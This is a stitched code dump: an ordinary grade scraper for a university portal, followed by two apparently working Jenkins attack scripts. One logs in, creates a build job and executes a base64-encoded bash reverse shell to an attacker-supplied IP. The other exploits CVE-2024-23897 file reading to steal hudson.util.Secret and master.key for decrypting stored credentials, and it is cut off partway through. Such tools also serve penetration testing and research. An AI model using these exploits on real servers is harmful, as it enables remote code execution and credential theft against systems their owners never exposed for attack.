def delete_course(user_id, course_id, year, semester):
conn = sqlite3.connect('data.db')
c = conn.cursor()
c.execute('''
DELETE FROM courses WHERE user_id = ? AND course_id = ? AND year = ? AND semester = ?
''', (user_id, course_id, year, semester))
conn.commit()
conn.close()
| 3,611 | Python | .py | 107 | 27.981308 | 180 | 0.613833 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,562 | course.py | Xunop_death-knell/course.py | class Course:
def __init__(self, year, semester, course_id, name, type, credit, gpa, normal_score, real_score, total_score, user_id):
self.year = year
self.semester = semester
self.course_id = course_id
self.name = name
self.type = type
self.credit = credit
self.gpa = gpa
self.normal_score = normal_score
self.real_score = real_score
self.total_score = total_score
self.is_dead = self.check_if_dead(total_score)
self.user_id = user_id
@staticmethod
def check_if_dead(total_score):
"""Determine if the course result is failing based on total_score."""
        # Scores arrive from the scraper as strings, so compare numerically when possible.
        try:
            if float(total_score) < 60:
                return True
        except (TypeError, ValueError):
            pass
        return total_score == '不及格'  # the literal grade string meaning "failed"
    def __str__(self):
        base_info = (f"{self.name} - Year: {self.year}, Semester: {self.semester}, "
                     f"Credit: {self.credit}, GPA: {self.gpa}, "
                     f"Total Score: {self.total_score}, Failed: {self.is_dead}")
if self.normal_score not in [None, '', 'NULL']:
base_info += f", Normal Score: {self.normal_score}"
if self.real_score not in [None, '', 'NULL']:
base_info += f", Real Score: {self.real_score}"
return base_info
def to_json(self):
return {
'year': self.year,
'semester': self.semester,
'course_id': self.course_id,
'name': self.name,
'type': self.type,
'credit': self.credit,
'gpa': self.gpa,
'normal_score': self.normal_score,
'real_score': self.real_score,
'total_score': self.total_score,
'is_dead': self.is_dead
}
def __eq__(self, other):
return self.to_json() == other.to_json()
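# Hedged usage sketch (added; all values hypothetical):
#
#   c = Course("2023-2024", "1", "B0001", "Calculus", "Required", "4.0", "0",
#              "40", "15", "55", "B21000000")
#   c.is_dead     # True, since "55" is below the passing score of 60
#   c.to_json()   # dict ready to post to the webhook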
| 1,856 | Python | .py | 46 | 30.391304 | 123 | 0.561179 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,563 | user.py | Xunop_death-knell/user.py | class User:
def __init__(self, user_id, username, password, year, semester):
self.user_id = user_id
self.username = username
self.password = password
self.semester = semester
self.year = year
| 236 | Python | .py | 7 | 26.428571 | 68 | 0.620087 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,564 | main.py | Xunop_death-knell/main.py | #!/bin/python3
import requests
import ddddocr
import argparse
import re
import base64
import difflib
import os
from time import sleep
from PIL import Image
import io
from contextlib import redirect_stdout
from io import StringIO
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from course import Course
from sqlite import insert_course, get_course, update_course, create_database
def parse_args():
# Parse args from command line
parser = argparse.ArgumentParser(description='A simple crawler for NJUPT')
parser.add_argument('-u', '--user', help='User ID', required=True)
parser.add_argument('-p', '--password',
help='User Password', required=True)
parser.add_argument('-n', '--name', help='User Name', required=True)
parser.add_argument(
'-y', '--year', help='Year(eg: 2023-2024)', required=True)
parser.add_argument('-s', '--semester',
help='Semester(eg: 1)', default='')
# webhook
parser.add_argument('-w', '--webhook',
help='Webhook URL', default='')
return parser.parse_args()
def parse_score(content):
try:
# base64 decode
decoded_str = base64.b64decode(
content).decode('utf-8', errors='ignore')
pattern = re.compile(r'l<([^;]+);+>>;')
matches = pattern.findall(decoded_str)
        # skip the first 19 matches (leading header/metadata fields)
matches = matches[19:]
courses = []
course_data = {}
for idx, match in enumerate(matches):
if match == ' \\':
match = 'NULL'
if match == 'o<f>':
break
match = match.strip()
# Create course fields based on the index within a cycle of 22
cycle_index = idx % 22
if cycle_index == 0:
course_data['year'] = match
elif cycle_index == 1:
course_data['semester'] = match
elif cycle_index == 2:
course_data['course_id'] = match
elif cycle_index == 3:
course_data['name'] = match
elif cycle_index == 4:
course_data['type'] = match
elif cycle_index == 6:
course_data['credit'] = match
elif cycle_index == 8:
course_data['gpa'] = match
elif cycle_index == 9:
course_data['normal_score'] = match
elif cycle_index == 11:
course_data['real_score'] = match
elif cycle_index == 13:
course_data['total_score'] = match
course_data['user_id'] = user_id
# Create a Course object and add to the list when all required data is gathered
courses.append(Course(**course_data))
return courses
except Exception as e:
print(f"An error occurred: {e}")
return []
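# Added illustration: the base64-decoded __VIEWSTATE is a serialized ASP.NET
# control tree in which each table cell appears as "l<value;>;". The regex
# above collects those cells; after the first 19 header fields are skipped,
# every run of 22 consecutive cells describes one course row, which is what
# the cycle_index dispatch maps onto Course fields.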
def push_to_feishu(courses: list[Course]):
headers = {
'Content-Type': 'application/json'
}
for course in courses:
# If the course has not been updated, skip
if not check_course_update(course, user_id):
print('Course has not been updated, skipping...')
continue
requests.post(
webhook_url, headers=headers, json=course.to_json())
def store_course(course: Course, user_id: str):
if check_course_update(course, user_id):
print('Course has been updated, updating...')
update_course(course, user_id)
if not check_course_exist(course, user_id):
print('Course does not exist, inserting...')
insert_course(course, user_id)
# Check whether the course has been updated: if the total score has changed, it needs updating
def check_course_update(course: Course, user_id: str):
# Get course info from database
stored_course = get_course(user_id, course.course_id,
course.year, course.semester)
if stored_course is None:
return True
# If the total score has changed, update the course
if stored_course.total_score != course.total_score:
return True
else:
# If the total score hasn't changed, no update is required
return False
def check_course_exist(course: Course, user_id: str):
stored_course = get_course(user_id, course.course_id,
course.year, course.semester)
if stored_course is None:
return False
return True
def get_courses(user_id, user_pwd, year, semester, webhook_url):
try:
login_url = "http://jwxt.njupt.edu.cn"
driver.get(login_url)
sleep(5)
captcha_element = driver.find_element(By.ID, "icode")
location = captcha_element.location
size = captcha_element.size
screenshot = driver.get_screenshot_as_png()
image_stream = io.BytesIO(screenshot)
image = Image.open(image_stream)
# Get the position of the captcha
left = location['x']
top = location['y']
right = left + size['width']
bottom = top + size['height']
# Get the captcha image
captcha_image = image.crop((left, top, right, bottom))
captcha = ocr.classification(captcha_image)
# print(captcha)
driver.find_element(By.NAME, "txtUserName").send_keys(
user_id)
driver.find_element(By.NAME, "TextBox2").send_keys(
user_pwd)
driver.find_element(By.NAME, "txtSecretCode").send_keys(
captcha)
driver.find_element(By.ID, "RadioButtonList1_2").send_keys(
Keys.SPACE)
driver.find_element(By.NAME, "Button1").click()
WebDriverWait(driver, 10).until(EC.alert_is_present())
alert = Alert(driver)
# print("alert:", alert.text)
# Accept the alert
alert.accept()
# Find the menu
information_query_menu = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located(
(By.XPATH, "//span[contains(text(), '信息查询')]"))
)
# Move to the menu
ActionChains(driver).move_to_element(information_query_menu).perform()
score_query_link = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located(
(By.XPATH, "//a[contains(@onclick, '成绩查询')]"))
)
# Need to switch to the iframe
driver.switch_to.frame("iframeautoheight")
# driver.save_screenshot('before_click.png')
score_query_link.click()
ActionChains(driver).move_by_offset(100, 100).perform()
# driver.save_screenshot('after_click.png')
print("Querying score...")
# print(driver.current_url)
# print(driver.page_source)
WebDriverWait(driver, 10).until(
EC.presence_of_element_located(
(By.ID, "ddlXN"))
)
# Select year
year_select = driver.find_element(By.NAME, "ddlXN")
# print(year_select.text)
year_select.send_keys(year)
# Select semester
semester_select = driver.find_element(By.NAME, "ddlXQ")
semester_select.send_keys(semester)
query_button = driver.find_element(By.ID, "Button1")
query_button.click()
WebDriverWait(driver, 10).until(
EC.presence_of_element_located(
(By.ID, "Datagrid1"))
)
score_table = driver.find_element(By.NAME, "__VIEWSTATE")
score_value = score_table.get_attribute("value")
# score_content = score_table.get_attribute("innerHTML")
# print(score_value)
courses = parse_score(score_value)
# for course in courses:
# print(course)
return courses
finally:
driver.quit()
### Main ###
args = parse_args()
user_name = args.name
user_id = args.user
user_pwd = args.password
year = args.year
semester = args.semester
webhook_url = args.webhook
# suppress ddddocr's banner output during initialization
null_file = StringIO()
with redirect_stdout(null_file):
ocr = ddddocr.DdddOcr()
options = Options()
# Use headless mode
options.add_argument("--headless")
driver = webdriver.Firefox(options=options)
create_database()
courses = get_courses(user_id, user_pwd, year, semester, webhook_url)
push_to_feishu(courses)
for course in courses:
if course is not None:
store_course(course, user_id)
| 8,770 | Python | .py | 224 | 30.584821 | 95 | 0.61916 | Xunop/death-knell | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,565 | linux_revshell_cmd.py | stevenvegar_Jenkins_scripts/linux_revshell_cmd.py/linux_revshell_cmd.py | from bs4 import BeautifulSoup
import argparse
import base64
import json
import random
import re
import requests
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def parse_args():
parser = argparse.ArgumentParser(description='Bash reverse shell from Jenkins on a Linux-based server using batch command')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
parser.add_argument('-r','--reverse', type=str, required=True, help='Required. IP to receive reverse shell')
parser.add_argument('-rp','--revport', type=str, required=True, help='Required. Port to receive reverse shell')
parser.add_argument('-u','--username', type=str, help='Jenkins username (default: anonymous)')
parser.add_argument('-p','--password', type=str, help='Jenkins password (default: '')')
parser.add_argument('--local_proxy', action='store_true', help="Enable local proxy (default: {'http': 'http://127.0.0.1:8080'})")
return parser.parse_args()
def main():
args = parse_args()
WEB_URL = args.website if 'http' in args.website else 'http://' + args.website
WEB_PORT = args.webport if args.webport else 8080
WEBSITE = str(WEB_URL) + ':' + str(WEB_PORT)
LOCAL_IP = args.reverse
LOCAL_PORT = args.revport
USERNAME = args.username if args.username else "anonymous"
PASSWORD = args.password if args.password else ""
PROXIES = {'http': 'http://127.0.0.1:8080'} if args.local_proxy else None
#Get the first JSESSIONID to perform login authentication
t = requests.get(WEBSITE + "/script", proxies=PROXIES)
#Checking connection to Jenkins server
if t.status_code == 403:
print("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins server. Check URL and port.")
exit()
#Baking first cookies
set_cookies1 = re.search("^(.*?);", (t.headers['Set-Cookie'])).group()
jsession1 = re.search("JSESSIONID.........",set_cookies1).group()
node_cookie1 = re.search("node(.*?);",set_cookies1).group()
cookies1 = {jsession1: node_cookie1}
#JSESSIONID.de9599e1=node03166kmkfqft11st4rulza2916212.node0;
#Server information based on response headers
print ("[+] Server version: " + t.headers['Server'])
print ("[+] Jenkins version: " + t.headers['X-Jenkins'])
print ("[+] Hudson version: " + t.headers['X-Hudson'])
#Post data to send in order to login
login_data = {
"j_username": USERNAME,
"j_password": PASSWORD,
"Submit": "Sign in"}
#Send authentication request
s = requests.post(WEBSITE + "/j_acegi_security_check", cookies=cookies1, data=login_data, allow_redirects=False, proxies=PROXIES)
#Checking connection to login portal
if s.status_code == 302:
print("[>] Authentication in progress as " + USERNAME, end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not connect to Jenkins login portal. Check URL and port.")
exit()
#Baking second cookies and checking if credentials work
set_cookies2 = re.search("^(.*?);", (s.headers['Set-Cookie'])).group()
jsession2 = re.search("JSESSIONID.........",set_cookies2)
if jsession2:
jsession2 = jsession2.group()
node_cookie2 = re.search("node(.*?);",set_cookies2).group()
print ("[+] Valid credentials!!! Authentication successful!!!")
else:
print("[-] Error: Can not perform authentication, check credentials or permissions...")
exit()
cookies2 = {jsession2: node_cookie2}
#JSESSIONID.de9599e1=node0168z3renghcpo1hhfd1dq9zy47241.node0;
#Listing all current jobs
r = requests.get(WEBSITE + "/view/all/newJob", cookies=cookies2, proxies=PROXIES)
#Checking if user is able to view current jobs
if r.status_code == 200:
print("[>] Listing existing jobs and getting Jenkins-Crumb token", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not list current jobs, user does not have the necessary privileges. Check it manually.")
#Grabbing Jenkins-Crumb from response body
soup = BeautifulSoup(r.content, "html.parser")
crumb = soup.find_all('script')[19].text
jenkins_crumb = re.search("[a-f0-9]{32}",crumb).group()
#Create a random build name to avoid duplicates
build_name = "build_" + ''.join(random.choice('0123456789') for i in range(6))
#New job information and type
build_data = {
"name": build_name,
"mode": "hudson.model.FreeStyleProject",
"Jenkins-Crumb": jenkins_crumb}
#Creating a new job
q = requests.post(WEBSITE + "/view/all/createItem", data=build_data, cookies=cookies2, proxies=PROXIES)
#Checking if user is able to create new jobs
if q.status_code == 200:
print("[>] Creating a new job to spawn our reverse shell", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not create a new job, user does not have the necessary rights. Check it manually.")
#Bash reverse shell
#https://www.revshells.com/Bash%20-i?ip=<IP>&port=<PORT>&shell=/bin/bash
dec_payload = "/bin/bash -i >& /dev/tcp/" + LOCAL_IP + "/" + LOCAL_PORT + " 0>&1"
encode = str(base64.b64encode(bytes(dec_payload, "utf-8")), encoding='ascii')
reverse_shell = "echo " + encode + " | base64 -d | bash"
#Configuration of the new job to execute payload
json_config = {
"builder": {
"command": reverse_shell,
"stapler-class": "hudson.tasks.Shell",
"$class": "hudson.tasks.Shell"
},
"Jenkins-Crumb": jenkins_crumb
}
#Encoding configuration data into json format
job_data = {
"Jenkins-Crumb": jenkins_crumb,
"Submit": "Save",
"json": json.dumps(json_config)
}
#Saving job configuration with reverse shell payload
p = requests.post(WEBSITE + "/job/" + build_name + "/configSubmit", data=job_data, cookies=cookies2, proxies=PROXIES)
#Checking if the job configuration is correct
if p.status_code == 200:
print("[>] Configuring job " + build_name + " with the reverse shell payload", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not configure the new job, user does not have the necessary rights. Check it manually.")
#Necessary cookies to start the job
params = {"delay": "0sec"}
crum_head = {"Jenkins-Crumb": jenkins_crumb}
#Initializing the job to execute the reverse shell
o = requests.post(WEBSITE + "/job/" + build_name + "/build", params=params, headers=crum_head, cookies=cookies2, proxies=PROXIES)
if o.status_code == 201:
print("[>] Executing the job with the reverse shell, check your listener", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
else:
print ("[-] Error: Can not execute the new job, user does not have the necessary rights. Check it manually.")
#Finalizing script
print ("[+] Exploit executed successfully, should receive a Bash reverse shell. Enjoy :D")
if __name__ == "__main__":
main()

# ============================================================
# File: get_creds_CVE-2024-23897.py
# Path: stevenvegar_Jenkins_scripts/get_creds_CVE-2024-23897.py
# ============================================================
import argparse
import base64
import binascii
import re
import requests
import threading
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
from Crypto.Cipher import AES
from hashlib import sha256
def parse_args():
parser = argparse.ArgumentParser(description='Decrypt global credential passwords using CVE-2024-23897 from Jenkins on Windows')
parser.add_argument('-w', '--website', type=str, required=True, help='Required. Jenkins website URL or IP')
parser.add_argument('-wp', '--webport', type=int, help='Jenkins website port (default: 8080)')
return parser.parse_args()
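# Example invocation (placeholder values, not from the original script):
#   python3 get_creds_CVE-2024-23897.py -w http://10.10.10.10 -wp 8080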
def check_connection(WEBSITE):
#Checking connection to Jenkins server
try:
r = requests.get(WEBSITE)
print ("[>] Connecting to Jenkins server", end='', flush=True); [print('.', end='', flush=True) or time.sleep(0.5) for _ in range(5)]; print()
#Server information based on response headers
print ("[+] Server version: " + r.headers['Server'])
print ("[+] Jenkins version: " + r.headers['X-Jenkins'])
print ("[+] Hudson version: " + r.headers['X-Hudson'])
print (" [ ] ...")
jenkins_version = int(r.headers['X-Jenkins'][0:1] + r.headers['X-Jenkins'][2:5])
if jenkins_version >= 2442:
print ("[X] Jenkins version not vulnerable!")
print ("[X] This exploit works only in versions <= 2.441")
exit()
print ("[>] Checking anonymous authorization level...")
if r.status_code == 200:
print (" [+] Overall/Read permission found")
print (" [+] Anonymous can read ANY local files...")
return True
elif r.status_code == 403:
print (" [-] Overall/Read permission NOT found")
print (" [-] Anonymous can read only first 3 lines of ANY local files")
return False
	except Exception:
		# A bare except would also swallow the SystemExit raised above for
		# non-vulnerable versions, so catch Exception only
		print ("[X] Error: Can not connect to Jenkins server. Check URL and port.")
		exit()
def first_request(WEBSITE, SESSION, PATH, PARAMS):
	# The first request downloads the server responses (Side: download)
headers1 = {
"Session": SESSION,
"Side": "download",
"Content-type": "application/x-www-form-urlencoded"
}
# Send first POST request
req_session = requests.Session()
t = req_session.post(WEBSITE + PATH, headers=headers1, params=PARAMS)
# Receive data from the response and keep them as hex
req_session.close()
hex_values = []
for byte in t.content:
hex_values.append(hex(byte)[2:].zfill(2))
hex_string = ''.join(hex_values)
# Tracing boundaries where the retrieved data is in the response
# ERROR: "..............." is not a valid option
if "4552524f523a2022" in hex_string and "22206973206e6f7420612076616c6964206f7074696f6e" in hex_string:
start = hex_string.index("4552524f523a2022") + 16
end = hex_string.index("22206973206e6f7420612076616c6964206f7074696f6e")
# ERROR: Too many arguments: ............... $ java
elif "4552524f523a20546f6f206d616e7920617267756d656e74733a20" in hex_string and "0d0a00000024086a617661" in hex_string:
start = hex_string.index("4552524f523a20546f6f206d616e7920617267756d656e74733a20") + 54
end = hex_string.index("0d0a00000024086a6176")
elif "4552524f523a20546f6f206d616e7920617267756d656e74733a20" in hex_string and "0a00000024086a617661" in hex_string:
start = hex_string.index("4552524f523a20546f6f206d616e7920617267756d656e74733a20") + 54
end = hex_string.index("0a00000024086a6176")
# ERROR: No such job ............... exists. Perhaps
elif "4552524f523a204e6f2073756368206a6f6220" in hex_string and "206578697374732e2050657268617073" in hex_string:
start = hex_string.index("4552524f523a204e6f2073756368206a6f6220") + 38
end = hex_string.index("206578697374732e2050657268617073")
# ERROR: No argument is allowed: ............... " java"
elif "4552524f523a204e6f20617267756d656e7420697320616c6c6f7765643a20" in hex_string and "0a00000022086a617661" in hex_string:
start = hex_string.index("4552524f523a204e6f20617267756d656e7420697320616c6c6f7765643a20") + 62
end = hex_string.index("0a00000022086a617661")
# ERROR: ............... " java"
elif "4552524f523a20" in hex_string and "0a00000022086a617661" in hex_string:
start = hex_string.index("4552524f523a20") + 14
end = hex_string.index("0a00000022086a617661")
# ERROR: No such job ............... exists.
elif "4552524f523a204e6f2073756368206a6f6220" in hex_string and "206578697374732e0" in hex_string:
start = 0
end = 0
# ERROR: Argument "..............." is required
elif "4552524f523a20417267756d656e742022" in hex_string and "222069732072657175697265640" in hex_string:
start = 0
end = 0
# ERROR: anonymous
elif "4552524f523a20616e6f6e796d6f757320" in hex_string:
start = 0
end = 0
# username and password
elif "757365726e616d65" in hex_string and "70617373776f7264" in hex_string:
start = 0
end = len(hex_string)
return hex_string[start:end]
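	# The hex markers above are plain UTF-8 strings, e.g. (illustrative):
	#   '4552524f523a2022' == 'ERROR: "'.encode().hex()
	#   '757365726e616d65' == 'username'.encode().hex()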
def second_request(line, WEBSITE, SESSION, PATH, PARAMS):
	# The second request uploads the CLI command to the server (Side: upload)
print (" [ ] ...")
headers2 = {
"Session": SESSION,
"Side": "upload",
"Content-type": "application/octet-stream"
}
data = binascii.unhexlify(line)
request_obj = requests.Request('POST', WEBSITE + PATH, headers=headers2, params=PARAMS, data=data)
# Obtain prepared request and delete Content-Length
prepared_request = request_obj.prepare()
prepared_request.headers.pop("Content-Length", None)
# Send second POST request
s = requests.Session()
response = s.send(prepared_request)
s.close()
def get_installation_folder(WEBSITE, SESSION, PATH, PARAMS):
	# Send requests to known paths and guess where Jenkins is installed
print("[>] Checking Jenkins installation folder")
poss_paths = {
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'C:\ProgramData\Jenkins\.jenkins\secrets\hudson.util.Secret'
"3d00003b40": r"C:\ProgramData\Jenkins\.jenkins\secrets\hudson.util.Secret",
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret'
"3c00003a40": r"C:\Program Files (x86)\Jenkins\secrets\hudson.util.Secret",
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'C:\Program Files\Jenkins\secrets\hudson.util.Secret'
"3600003440": r"C:\Program Files\Jenkins\secrets\hudson.util.Secret",
# java -jar jenkins-cli.jar -s <JENKINS_URL> who-am-i @'/var/lib/jenkins/secrets/hudson.util.Secret'
"2e00002c40": r"/var/lib/jenkins/secrets/hudson.util.Secret"
}
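	# The hex prefixes above appear to encode args4j argument-length framing: 0x40 is
	# '@' and, e.g., 0x3b (59) in "3d00003b40" matches len('@' + path) for the 58-char
	# ProgramData path. This framing is an assumption inferred from the byte values.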
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
try:
with ThreadPoolExecutor(max_workers=2) as executor:
for key, path in poss_paths.items():
# Generate a request line for each path
line = "0000000a00000877686f2d616d2d69000000" + key + path.encode('utf-8').hex()
# Retrieve credentials file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(1)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all = first_request_future.result()
second_request_future.result()
time.sleep(1)
ascii_text = bytes.fromhex(hex_all).decode('utf-8', errors='ignore')
if "No such file" not in ascii_text:
print ("[>] Jenkins installation path found!")
ascii_path = bytes.fromhex(line[46:-54]).decode('utf-8', errors='ignore')
print (f" [>] {ascii_path}")
return key, ascii_path
break
except:
print(" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
print("[X] No Jenkins secret credentials were found...")
print("[X] Exploit not completed. Try again!")
exit()
def retrieve_hudson_secret(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER):
# This sends 3 requests to download hudson.util.Secret from server
print("[>] Downloading hudson.util.Secret binary file")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 keep-build NAME 1 @'<JENKINS_PATH>\secrets\hudson.util.Secret'
# Replace backslashes to slashes if requests are going to linux
path = r"/secrets/hudson.util.Secret" if "/var/lib/jenkins" in INS_FOLDER else r"\secrets\hudson.util.Secret"
SECRET_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# List of CLI commands in hex
lines = {
"First" : "0000000c00000a6b6565702d6275696c64000000060000044e414d450000000300000131000000" + KEY + SECRET_PATH_HEX,
"Second" : "0000000c00000a6b6565702d6275696c64000000060000044e414d45000000" + KEY + SECRET_PATH_HEX,
"Third" : "0000000c00000a6b6565702d6275696c64000000" + KEY + SECRET_PATH_HEX
}
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
for part, line in lines.items():
# Retrieve each part of binary file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(2)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all += first_request_future.result()
hex_all = hex_all.replace("0000000208","")
hex_all = hex_all.replace("00000001","")
hex_all += "0a" if len(hex_all) != 544 else ""
second_request_future.result()
time.sleep(2)
print(f" [+] {part} part of the binary done! {len(hex_all)} bytes")
# If binary file reaches the correct size, loop ends
if len(hex_all) == 544:
break
break
except:
print(" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
# Split the response and encode hex to Windows-1252, then convert to bytes
bytes_object = bytes.fromhex(hex_all)
win_encoded = bytes_object.decode('windows-1252', errors='ignore').encode('windows-1252', errors='ignore')
bin_result = win_encoded.hex()
bin_result = bin_result.replace("3f","9d",1)
bin_result = bin_result.replace("3f","8f",1)
	if len(bin_result) != 544:
		print (" [-] Binary file was retrieved incomplete, downloading the InstanceIdentity key!")
		retrieve_instance_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, bin_result)
		# retrieve_instance_key already wrote the repaired hudson.util.Secret,
		# so return here instead of overwriting it with the incomplete data below
		return
	else:
		print (" [+] We got lucky, binary file was retrieved complete on first try!")
	# Convert hex to bytes and write to a file
	binary_data = bytes.fromhex(bin_result)
	with open("hudson.util.Secret", 'wb') as binary_file:
		binary_file.write(binary_data)
	print (" [+] Gluing all parts into a single binary file done!")
	print ("[>] Downloading hudson.util.Secret completed!")
def retrieve_instance_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER, bin_result):
	# If hudson.util.Secret could not be downloaded completely, download another key file and concatenate the data
print("[>] Downloading InstanceIdentity.key binary file")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 keep-build NAME 1 @'<JENKINS_PATH>\secrets\org.jenkinsci.main.modules.instance_identity.InstanceIdentity.KEY'
# Key mapping, according to the identified Jenkins path, the key changes
key_mapping = {
"3c00003a40": "6b00006940",
"3600003440": "2e00002c40",
"3d00003b40": "6c00006a40",
"2e00002c40": "5d00005b40"
}
KEY = key_mapping.get(KEY, KEY)
# Replace backslashes to slashes if requests are going to linux
path = r"/secrets/org.jenkinsci.main.modules.instance_identity.InstanceIdentity.KEY" if "/var/lib/jenkins" in INS_FOLDER else r"\secrets\org.jenkinsci.main.modules.instance_identity.InstanceIdentity.KEY"
INSIDE_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# List of CLI commands in hex
lines = {
"First" : "0000000c00000a6b6565702d6275696c64000000060000044e414d450000000300000131000000" + KEY + INSIDE_PATH_HEX,
"Second" : "0000000c00000a6b6565702d6275696c64000000060000044e414d45000000" + KEY + INSIDE_PATH_HEX,
"Third" : "0000000c00000a6b6565702d6275696c64000000" + KEY + INSIDE_PATH_HEX
}
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
for part, line in lines.items():
# Retrieve each part of binary file
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(2)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all += first_request_future.result()
hex_all = hex_all.replace("0000000208","")
hex_all = hex_all.replace("00000001","")
hex_all += "0a" if len(hex_all) != 544 else ""
second_request_future.result()
time.sleep(2)
print (f" [+] {part} part of the binary done! {len(hex_all)} bytes")
# If binary file reaches the correct size, loop ends
if len(hex_all) == 544:
break
break
except:
print (" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
# Converting received data into InstanceIdentity key
bytes_object = bytes.fromhex(hex_all)
win_encoded = bytes_object.decode('windows-1252', errors='ignore').encode('windows-1252', errors='ignore')
iik_bin_result = win_encoded.hex()
if len(iik_bin_result) != 544:
print (" [-] InstanceIdentity Key binary file was not retrieved complete!")
print ("[X] Error: Can not retrieve binary files to decode secrets. Try again!")
exit()
else:
print ("[+] Downloading InstanceIdentity Key binary file completed!")
# Filling the first binary with the last bytes of second binary
miss_part = 544 - len(bin_result)
bin_all = bin_result + iik_bin_result[-miss_part:]
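	# Splice arithmetic (illustrative): if only 540 of the 544 hex chars were
	# recovered, miss_part == 4 and the last 4 hex chars (2 bytes) are taken
	# from the InstanceIdentity key dump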
# Convert hex to bytes and write to a file
binary_data = bytes.fromhex(bin_all)
with open("hudson.util.Secret", 'wb') as binary_file:
binary_file.write(binary_data)
print (" [+] Gluing both files all into a single binary file done!")
print("[>] Downloading hudson.util.Secret completed!")
def retrieve_master_key(WEBSITE, SESSION, PATH, PARAMS, KEY, INS_FOLDER):
# Download master.key from server
print ("[>] Downloading master key file")
# java -jar jenkins-cli.jar -s http://<JENKINS_IP>:8080 who-am-i @'<JENKINS_PATH>\secrets\master.key'
# Key mapping, according to the identified Jenkins path, the key changes
key_mapping = {
"3c00003a40": "3400003240",
"3600003440": "2e00002c40",
"3d00003b40": "3500003340",
"2e00002c40": "2600002440"
}
KEY = key_mapping.get(KEY, KEY)
# Replace backslashes to slashes if requests are going to linux
path = r"/secrets/master.key" if "/var/lib/jenkins" in INS_FOLDER else r"\secrets\master.key"
KEY_PATH_HEX = (INS_FOLDER + path).encode('utf-8').hex()
# CLI command in hex
line = "0000000a00000877686f2d616d2d69000000" + KEY + KEY_PATH_HEX
max_retries, retry_delay, retry_count = 3, 3, 0
while retry_count < max_retries:
hex_all = ""
try:
with ThreadPoolExecutor(max_workers=2) as executor:
first_request_future = executor.submit(first_request, WEBSITE, SESSION, PATH, PARAMS)
time.sleep(1)
second_request_future = executor.submit(second_request, line, WEBSITE, SESSION, PATH, PARAMS)
hex_all = first_request_future.result()
hex_all = hex_all.replace("0000000108","")
hex_all = hex_all.replace("0000000208","")
hex_all = hex_all[:-2] if hex_all.endswith("0d") else hex_all
second_request_future.result()
time.sleep(1)
				# If the key file has the correct size, stop retrying
				if len(hex_all) == 512:
					print (f" [+] Master.key file retrieved! {len(hex_all)} bytes")
					break
				# An incomplete key counts as a failed attempt, otherwise the loop never ends
				retry_count += 1
				time.sleep(retry_delay)
except:
print (" [-] Requests not completed. Retrying...")
retry_count += 1
time.sleep(retry_delay)
if retry_count == max_retries:
print("[X] Exploit not completed after multiple attempts... Try again!")
exit()
# Convert to ASCII only the bytes from the key
ascii_chain = bytes.fromhex(hex_all).decode('ascii', errors='ignore')
# Save master key
